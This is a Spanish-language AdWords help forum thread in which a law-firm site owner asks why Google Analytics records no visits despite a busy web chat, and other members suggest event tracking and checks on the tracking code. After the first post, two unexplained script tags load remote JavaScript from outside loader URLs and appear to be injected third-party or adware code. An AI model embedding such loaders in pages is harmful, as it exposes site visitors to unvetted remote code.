208 anunciantes en línea
208 anunciantes en línea
¿Sabes cuales son las métricas mas importantes de AdWords? ¿Entiendes lo que te dicen los datos de tu cuenta? Aquí puedes encontrar ayuda y descubrir la mejor forma de medir tus resultados de AdWords.
Guiame
favorite_border
Responder

Estadisticas

Novato ✭
# 1
Novato ✭

Porque mis estadisticas no reflejan nada? tengo un web chat en mi sitio y diarimanete se da asesoria a muchas personas que ingresa, sin embargo mi visitas y demas siguen en cero... que debo hacer?

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Expertos respondieronverified_user

bjabogados: cómo va? Por favor proporciónanos la direcció...

Colaborador Principal
# 2
Colaborador Principal
bjabogados: cómo va? Por favor proporciónanos la dirección web de tu sitio así te podemos ayudar.Saludos!

Hola Bjabogados,   Eso puede suceder porque al ingresar e...

Profesional ✭ ✭
# 3
Profesional ✭ ✭

Hola Bjabogados,

Eso puede suceder porque al ingresar el usuario al chat no genera que se vea una nueva página etiquetada con el código de analytics o porque al hacer clic salen de tu página y entran a la de tu proveedor de chat.

Para solucionar eso te recomiendo:

1. A los links que dirigen al chat configurarles un 'Virtual Pageview' o un 'Event' de Analytics.
  2. Crear un objetivo en Analytics de URL (para 'Virtual Pageview') o Evento (para un 'Event').

Así cuando haya ingresado a tu chat una persona para una asesoría dentro de tu página podrás hacer el respectivo seguimiento.

En el siguiente link podrás ver cómo http://www.google.com/intl/en/analytics/iq.html?&rd=1 En la sección Event Tracking and Virtual Pageviews.

Espero haberte podido resolver la duda.

Un saludo.

Rodrigo Acosta - Sígueme en: Twitter - @RodrigoAcostaS | G+ | LinkedIn
Experto en AdWords y Web Analytics

Fíjate también si el código de seguimiento está bien inst...

Colaborador Principal Alumni
# 4

Fíjate también si el código de seguimiento está bien instalado.

Saludos.

Nicolás Barrios | Director y Fundador de Adity | Google Partner

Hola bja abogados   Si analytics no llegua a contar ni si...

# 5

Hola bja abogados

Si analytics no llegua a contar ni siquiera las visitas, practicamente con total seguridad es el codigo de analytics, que o bien has borrado algun fragmento del codigo, o la totalidad (aveces pasa) o hay algo que interfiere en el, si no encuentras el fallo, prueba cambiarlo de sitio, y ponerlo en una mas zona alta de la pagina.

Un saludo

Gracias por su atención: mi web es: www.bjabogadoshondura...

Novato ✭
# 6
Novato ✭
Gracias por su atención: mi web es: www.bjabogadoshonduras.com

Muchas gracias por tu atención, pero no es el caso, pues...

Novato ✭
# 7
Novato ✭
Muchas gracias por tu atención, pero no es el caso, pues contratamos el servicio de zopim y los usuarios no salen de nuestra web mientras se mantiene contacto.